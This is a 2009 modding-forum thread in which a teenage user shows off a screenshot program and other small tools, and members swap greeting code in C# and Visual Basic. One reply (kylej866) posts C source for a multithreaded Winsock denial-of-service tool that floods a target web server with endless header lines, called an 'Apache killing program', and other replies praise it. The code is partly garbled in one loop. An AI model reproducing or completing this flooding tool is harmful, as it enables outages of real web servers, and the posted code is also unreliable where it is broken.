Page 1 of 2

MNS - Creations Programs

Posted: Sun May 17, 2009 9:34 pm
by Maks12
Hi
Here we want show you our program projects. :)

We have already released two little programs. The MM2 Register Tool and the MM2 Lock Deleter.

But now we have finished another program the Screenshooter .NET.
It allows you to take shoots from your screen and it will save them automatic to 4 formats: BMP, JPEG, PNG, GIF .

Heres one Screenshot (taken with the Screenshoter .NET ;) :D ):

https://mns-creations.gta-nightlife.de/img/pict0.jpg

Can you please post your opinions ? :)

Posted: Sun May 17, 2009 10:09 pm
by Franch88
You've made nice programs, great work. :) I like especially the latest one, the Screenshoter.NET, because is possible to save .jpg screenshots with the maximum quality, unlike Fraps. Soon at MM2X. :wink:
Nice tool the MM2 Register Tool, useful for not installed copies of MM2. The MM2 Lock Deleter isn't so useful for me, because the Maxoff's program MM2 Game Loader definitely solves the mm2.lock file problem, and not only that one. However, is better than another more old similar one. :wink:

Posted: Tue May 19, 2009 4:56 am
by Silent1Unknown
Nice program. As Franch said, it has the advantage over Fraps in that it can take HQ jpeg pics. Now I may not have to open Photoshop everytime to preserve the quality. :wink:

Question: Is this specific for games, just MM2, just desktop or anything at all?

Posted: Tue May 19, 2009 4:58 pm
by Maks12
You can save all screenshots you want, for games, for tutorials or anything else ;)

Posted: Wed May 20, 2009 4:17 pm
by Maks12
sry for doublepost
but when franch released the program, it would be nice when you can post ideas to complete the programs with new features, functions or other.
that would be nice. :afirmar: :)

Posted: Wed May 20, 2009 5:10 pm
by Tonywolfe121
You should try playing around with the code one topic below you :wink:

ps. What .NET launage are you into personaly my favorite is c#

Posted: Wed May 20, 2009 6:04 pm
by Maks12
I use Visual Basic.
It's easy but effectly ;) ^^

and i have already downloaded the decompiled exe ;)
but it's difficult to appreciate the code without knowing about the c++ language.

Posted: Wed May 20, 2009 10:24 pm
by kylej866
Lolz VB is a skiddie language :P. I learned Vb in 7th grade :D

C++ ftw :)

Posted: Wed May 20, 2009 10:36 pm
by Maks12
For me its ok you must think of that im only 14 years old ;)

but also if i would be older i think not thats a kiddie language. you can do nearly exact the same like in c# .

i know c++ is a little enhanced, but for my purposes vb is fully sufficient ;)

Posted: Thu May 21, 2009 8:09 pm
by Tonywolfe121
Im 14 also :D

Cough

Code: Select all

using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; namespace WindowsFormsApplication1 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { //Lets greet him! MessageBox.Show(Hi Maks12!); // hmm now what? //Meh lets end this xD } } }

Posted: Fri May 22, 2009 4:35 am
by Maks12
OK when you post code i will also post code :D

Code: Select all

Module Module1 'This is a console Sub Main() 'OK so Let's greet tonywolfe121 'shows up a MessageBox with the text 'Hi tonywolfe121 :D', with the information icon and the information sound of windows, with the title 'Greetings' MsgBox("Hi tonywolfe121 :D", MsgBoxStyle.Information, "Greetings") 'now the application will close End Sub End Module

Posted: Fri May 22, 2009 1:21 pm
by kylej866

Code: Select all

#include "stdafx.h" #include "winsock.h" #include "string.h" #include "stdio.h" #include "windows.h" #pragma comment(lib,"ws2_32") DWORD WINAPI attack(LPVOID); char target[256]; int main(int argc, char* argv[]) { int l=0; int j; DWORD dw; HANDLE hd; if(argc<2) { printf("usage: %s target", argv[0]); exit(0); } strncpy(target, argv[1], 256); printf("Attaching %s ...\n", target); for(j=0;j<50;j++) hd=CreateThread(NULL,0, attack, (LPVOID) l , 0, &dw); for(j=0;j<50>h_addr, host->h_length ); sck.sin_port = htons(80); if((s=socket(AF_INET,SOCK_STREAM,0))==-1) { printf("Socket couldn't be initiallized"); return -1; } if((connect(s,(struct sockaddr *)&sck,sizeof(sck)))) { printf("Couldn't connect"); return -1; } sprintf(buff, "GET / HTTP/1.0\n"); //printf("%s",buff); int len=strlen(buff); if((send(s,buff,len,0))==-1) { printf ("send error"); closesocket(s); return -1; } for(i=0;i<9999;i++) { if((send(s,space,strlen(space),0))==-1) { printf("Send Error on header number %d", i); closesocket(s); return -1; } } closesocket(s); return 0; }
My Apache killing program. Hax ftw :) :twisted:

Posted: Sat May 23, 2009 4:00 am
by dageek
Holy...
XD

Posted: Sat May 23, 2009 5:18 pm
by Maks12
wow :D
not bad ;) ^^

I'm now installing visual studio 10 beta 1.
let's see what microsoft has changed.
i hope it will have a new ribbon bar control. ^^
but i think no.

so please on topic :D

Franch what do you think when do you release it here ?

Posted: Sat May 23, 2009 10:47 pm
by Franch88
The Screenshoter.NET program is now available at MM2X here. There's no news at the home page because this isn't a program directly related with MM2.
For me this program is perfect how it is, no improvements needed. :) It's immediate and simple to use for the function for which it has been developed.

Good luck with your next ones, if you find interesting ideas. :wink: